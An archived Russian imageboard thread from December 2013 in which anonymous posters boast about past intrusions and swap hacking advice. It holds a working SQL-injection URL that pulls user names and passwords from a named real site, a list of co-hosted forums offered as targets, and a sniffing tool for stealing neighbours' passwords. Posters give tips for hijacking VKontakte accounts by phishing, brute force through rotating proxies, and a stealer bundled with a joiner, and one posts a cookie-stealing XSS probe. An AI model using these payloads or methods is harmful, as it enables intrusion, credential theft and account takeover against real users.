Не умирай, тредик! Я даже кину сюда статью про http://ru.wikipedia.org/wiki/%D0%A7%D0%B5%D0%BB%D0%BE%D0%B2%D0%B5%D0%BA_%D0%BF%D0%BE%D1%81%D0%B5%D1%80%D0%B5%D0%B4%D0%B8%D0%BD%D0%B5

Пнд 02 Дек 2013 22:47:51
http://www.monkey.org/~dugsong/dsniff/, запускал в сетке хостера, ловил разные пассы из открытого траффика соседей.

Пнд 02 Дек 2013 22:53:07
>>58304828
спасибо за ссылку

Пнд 02 Дек 2013 22:58:57
нет-нет, я не дам этому треду упасть! Неужели у меня нет ничего, чем можно бампать?.. кроме этого

Пнд 02 Дек 2013 23:00:25
>>58305632
А толку? Здесь всё равно нет адекватов, одна зелень.

Пнд 02 Дек 2013 23:01:52
>>58305729
вначале вроде бы были попытки дельного диалога, а потом все куда-то свалили даже оп-школьник

Пнд 02 Дек 2013 23:02:38
Вброшу из стареньких достижений - эксплуатация слепой SQL инъекции в Мамбе. Начислил себе денег. Жалею, что забил раскручивать дальше.
2009 год, если что.

Пнд 02 Дек 2013 23:04:39
http://habrahabr.ru/post/204066/

Пнд 02 Дек 2013 23:08:21
Незакрытый аутентификацией файловый менеджер на сайте реестра зоны .ORG. Опять же 2009.

Пнд 02 Дек 2013 23:14:38
Эксплуатация уязвимости в mydirtyhobby.com. Мог получать доступ в любой аккаунт, а там конечно же аматорное порево-порево, которое иначе можно посмотреть только заплатив. Поигрался и забил. 2008 год.

Пнд 02 Дек 2013 23:16:32
>>58306701
а после 2009 что? забросил хобби?

Пнд 02 Дек 2013 23:20:39
>>58298651

1. krasarossii.ru/video/video.php?l=0∓id=-1444 union select concat_ws(0x03a, id, user, pass), 2, 3, 4 from userlist--

Вывод в исходнике.

2. Аплоадер swf больше не пашет, ибо предлагает скачку. Скорее всего внесены изменения в .htaccess

Давай сюда свою ололо приватную скулю, лалака.

Пнд 02 Дек 2013 23:22:28
>>58306824
Иногда набегаю на что-нибудь занятное, но как-то всё реже. Кушать тоже хочется, приходится работать по другой теме, а с этих ковыряний обычно никакого профита. Сливать и продавать всякие базы уныло и не олд скул. Шарить инфу о найденных дырках в паблик тоже неинтересно. Обычно нахожу лазейку, раскручиваю насколько можно, поковыряюсь во внутренностях, посливаю что-нибудь для архива и так оставляю.

Пнд 02 Дек 2013 23:22:48
>>58307086
Боюсь тебя огорчить - нас тут два один, остальные съебались

Пнд 02 Дек 2013 23:26:54
http://myff.ru/. Это считай приложение-как-сервис, куда форумов на общем движке.

Пнд 02 Дек 2013 23:28:42
>>58307191
Не хотелось провернуть что-нибудь крупное? говорю, как будто сделку предлагаю лил я имею ввиду, не посещала мысль о воровстве денег, информации откуда-нибудь?

Пнд 02 Дек 2013 23:29:39
Кто нибудь обходил флаг httpOnly?

Пнд 02 Дек 2013 23:30:25
>>58307488
Учитывая количество сайтов на том же сервере, наверняка где-то что-нибудь найдётся.

1 forumbb.ru
2 build2.ru
3 forum.com.kz
4 ixbb.ru
5 rolevka.ru
6 www.apbb.ru
7 www.xxbb.ru
8 g3g.ru
9 topf.ru
10 bbworld.ru
11 7bk.ru
12 spybb.ru
13 db3.ru
14 forumsiti.ru
15 qpf.su
16 www.24bb.ru
17 myff.ru
18 starbb.ru
19 iboard.ws
20 pipl.su
21 naforume.com
22 10bb.ru
23 vamk.ru
24 forrum.eu
25 www.myforums.org.ua
26 18pluss.ru

Пнд 02 Дек 2013 23:32:30
>>58307768
Нужен именно титулус

Пнд 02 Дек 2013 23:34:45
>>58307627
Посещала, конечно. Но никакой действительно интересной информации дальше базы пользователей или транзакций с пластиком (было дохуя такого) практически не попадалось. Хорошо, конечно, когда удаётся вскрыть какой-то массовый сервис, типа бесплатной почты (ломал парочку в своё время) или фотоальбомов.
Чтобы пиздить информацию ради дальнейшей монетизации, её надо пиздить или очень много и с какими-то специфическими деталями, или из каких-то конкретных мест (платёжные системы и т.п.).

Пнд 02 Дек 2013 23:36:11
>>58307914
Просто тут задача поиметь конкретный аккаунт на сервисе практически равна задаче поиметь всю базу аккаунтов. Если мыло админа форума известно - ломись туда, ретривнешь пароль потом.

Пнд 02 Дек 2013 23:36:57
раз жара пошла... как аккаунт вконтактике взломать?

Пнд 02 Дек 2013 23:36:59
>>58308106
На чём попался?

Пнд 02 Дек 2013 23:38:56
>>58308235
фейк, либо почта жертвы

Пнд 02 Дек 2013 23:40:15
>>58308367
>либо почта жертвы
Если акк привязан к телефону (а таких нынче большинство), то не катит уже.

Пнд 02 Дек 2013 23:41:09

>>58308367
а если почты не знаю?

Пнд 02 Дек 2013 23:42:26
>>58308470
> то не катит уже.
точно
> а если почты не знаю?
попробуй социнжинерию

Пнд 02 Дек 2013 23:43:53
>>58308528
фишинг (если жертва достаточно тупая/невнимательная) или брутфорсить помаленьку (не знаю честно говоря, насколько это актуально для втентакля), если есть уверенность, что пароль слабый или как-то пересекается с паролем на других ресурсах

Пнд 02 Дек 2013 23:45:12
>>58308704
брутфорсинг не канает. CAPCHA
а вот почту жертвы - другое дело. вообще, попытайся найти о ней как можно больше инфы

Пнд 02 Дек 2013 23:46:16
>>58308787
>брутфорсинг не канает. CAPCHA
Даже если менять прокси? Блокировка на уровне аккаунта?

Пнд 02 Дек 2013 23:47:19
>>58308787
>а вот почту жертвы - другое дело
Ну толку то, если акк к телефону уже привязан? Сброс тогда только на него. Да и палево вообще это, пароли менять.

Пнд 02 Дек 2013 23:48:54
>>58308853
не ну как ты себе это представляешь? а возможно я не знаю про прогу, автоматом меняющую прокси Но все равно не прокатит, ибо со второй попытки уже просит подтверждение

Пнд 02 Дек 2013 23:50:11
>>58308924
не меняй пароль, действительно зачем? просто попробуй его к акку. у меня так один раз сработало

Пнд 02 Дек 2013 23:52:07
>>58308787
>брутфорсинг
2001 год ебана. Это говно уже не работет почти нигде. Распознавание капчи (хуй знает, может есть такое где) не поможет, плюс если есть соответствующая затычка, то ой-пи тоже на время заблокируют.
Разве что найти брутфорсилку, которая будет искать сама юзать прокси и сама распознавать капчу, да тебе и проксей-то не хватит.

Пнд 02 Дек 2013 23:53:48
>>58309026
>не ну как ты себе это представляешь?
Ты про смену проксей? Я под такие задачи давно собственные скрипты пишу.

Пнд 02 Дек 2013 23:54:31
>>58309104
ладно. мне надо уходить, как не печально, так что вот: пользуешь UFR стиллер + джойнер программа начальных классов, кидаешь жертве, радуешься.

>>58309220
> почти нигде
попизди еще. почти на любом бесплатном почтовике можн брутить спокойно

Пнд 02 Дек 2013 23:54:52
>>58309220
>которая будет искать сама юзать прокси и сама распознавать капчу
Распознавание CAPTCHA можно осилить (хотя и не со 100% успехом). А вот автопоиск прокси - это уже фантастика.

Пнд 02 Дек 2013 23:57:20
>>58309354
>кидаешь жертве
Остаётся только совсем ничего: убедить жертву скачать и запустить рандомное говное, ну и не обосраться окончательно, если у неё есть годный антивирус с HIPS.

Втр 03 Дек 2013 00:33:20
Да не бампайте уже, бесперспективно.

Втр 03 Дек 2013 00:43:20
>>58312029
&t;script>alert(document.cookie)&t;/script>

Втр 03 Дек 2013 00:47:28
>>58295490
Правда ли что только создатели антивирусов пишут вирусы? только честно, всегда хотел узнать

Втр 03 Дек 2013 00:50:23
>>58312552
Не пишут они вирусов, этот миф с 90-х ещё ходит (когда, вероятно, только и мог быть отчасти правдой). Сейчас и без того малвари пруд-пруди, успевай только анализировать и отгружать айболитов.


← К списку тредов